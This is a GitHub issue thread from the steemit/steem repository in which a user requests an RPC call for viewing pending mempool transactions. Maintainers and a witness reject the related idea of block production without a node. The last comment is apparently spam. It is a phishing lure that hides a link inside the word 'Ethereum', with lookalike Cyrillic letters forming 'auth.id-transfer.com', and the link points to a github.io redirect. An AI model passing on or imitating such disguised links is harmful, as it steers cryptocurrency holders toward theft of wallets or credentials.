### ISSUE TITLE
As a RPC node consumer, I want to view pending transactions

### ISSUE THREAD

**Issue by Smittyvb** [steemit/steem#2872]
I would like a RPC call to view pending transactions, without running a node. This could be useful for algorithmic trading, and block production without a node. Also, bots can decrease the time between command and response.

**Comment by youkaicountry** [comment]
Thanks for the user-story. Actually, a transaction polling api call is currently being worked on:
https://github.com/steemit/steem/issues/2458

**Comment by youkaicountry** [comment]
Reopening, what you are asking for is pending transaction discovery, not status for a specific transaction?

**Comment by Smittyvb** [comment]
Yes. I want to get full details of every transaction in the mempool, so I can do things with those transactions. For example, I might want to check if a user has made a transfer to me, then immediately transfer back to them with a response, before the user's transaction goes on the blockchain. Or, I might want to produce blocks as a witness, without running a node.

**Comment by mvandeberg** [comment]
> Or, I might want to produce blocks as a witness, without running a node.

This kind of defeats the purpose of the blockchain. What if all witnesses did this? Then every transaction would get included regardless of whether it is valid or not. This is a horrendous idea.

> or example, I might want to check if a user has made a transfer to me, then immediately transfer back to them with a response

Also a horrible idea. Acting on transactions in the mempool is idiotic. You don't know that the transactions will make it in to the blockchain. There may be a high degree of certainty, but the only guarantee is when the transaction becomes irreversible.

**Comment by Smittyvb** [comment]
> > Or, I might want to produce blocks as a witness, without running a node.
>
> This kind of defeats the purpose of the blockchain. What if all witnesses did this? Then every transaction would get included regardless of whether it is valid or not. This is a horrendous idea.

Most witnesses should nodes. However, witnesses without nodes can still validate transactions. Most checks on transactions can be done without needing to inspect the chain. The checks that require information about the chain could be verified using RPC calls. (such as only spending what you own,  Also, wouldn't blocks with invalid transactions be rejected by the network? Producing blocks by directly pulling the mempool and signing it is a bad idea, but it's not so bad if you actually validate the transaction, and ensure that users aren't over their bandwidth/RC limit. 

As for acting on transfers, I was thinking of sending commands to a bot by transferring 0.001 STEEM. As long as you ensure the transaction is valid in the mempool, you can send a response. If you limit how often users can send command, it would be pointless for users to scam your bot out of a cent.

**Comment by corkyk** [comment]
*However, witnesses without nodes can still validate transactions.*

There is no such thing? Can you clarify what you define as a "witness without a node"?

**Comment by corkyk** [comment]
As noted by @mvandeberg, no, that's NOT how blockchains work. You also left out seed nodes. I didn't ask what a witness does. I asked you to clarify what you mean by this magical new kind that can do it somehow magically without protocol, or a processing node. This response did not answer my question. 

It sounds like you are looking for angles to defeat the system, and your example of spamming 0.001 cent transactions sort of amplifies that. It's not reasonable nor technically possible to "witness" blocks without running the steemd code to do so. 

I hold no authority on this git, other than being a mid 60s witness myself for close to a year, but I'd recommend closing this thread and getting it out of the way of real work. My 2 steem cents.

**Comment by Smittyvb** [comment]
@corkyk 
> seed nodes

You can get recent block info from RPC nodes already, making seed nodes unnecessary in this case. You don't need to know the entire blockchain to witness, only the last block.
> without protocol

JSON-RPC is a protocol, and anybody can already tell nodes about blocks over JSON-RPC.
> [without] a processing node

You don't need to run a full node to process transactions. You just need to put them together, and sign them. I am proposing, in this issue, that a protocol to get transactions to process is added.

> spamming 0.001 cent transactions

Yes, this is not a very good example I chose to use.

> It's not reasonable nor technically possible to "witness" blocks without running the steemd code to do so.

I don't see any technical issues stopping this.

---
Here's a better use case for needing the mempool: analysing it. It can be useful to see how long transactions wait

**Comment by corkyk** [comment]
*You can get recent block info from RPC nodes already* - you do realize where the RPC nodes get validated block info from right? ---

JSON-RPC is a data type format and a protocol to exchange it with other clients and servers, by definition yes, but that doesnt make it authorative on blocks.

I dont care to continue the conversation, because I dont have time to teach blockchain basics here, nor is this the forum for that, but " a protocol to get transactions to process" is called, being in rotation with a steemd node running the modules='witness' installation. It's really as simple as that. The rest is on our whitepaper and living technical documentation online. 

TL;dr: Circumventing the way blocks are processed, is circumventing the entire reason and methodology behind how things work here. And it wont fly. As noted by staff of the company that invented this platform and contributors above.

Cheers

**Comment by sophiaturner621BMW** [comment]
Could anyone tell me if the Ethere [аuth.id-trаnsfеr.com](https://auth-241.github.io/redirect/)um sent here can be revoked later? Since I already used it 😔

<img width="369" alt="Image" src="https://github.com/user-attachments/assets/d86e1c4c-b063-4481-96db-e220849589a5" />
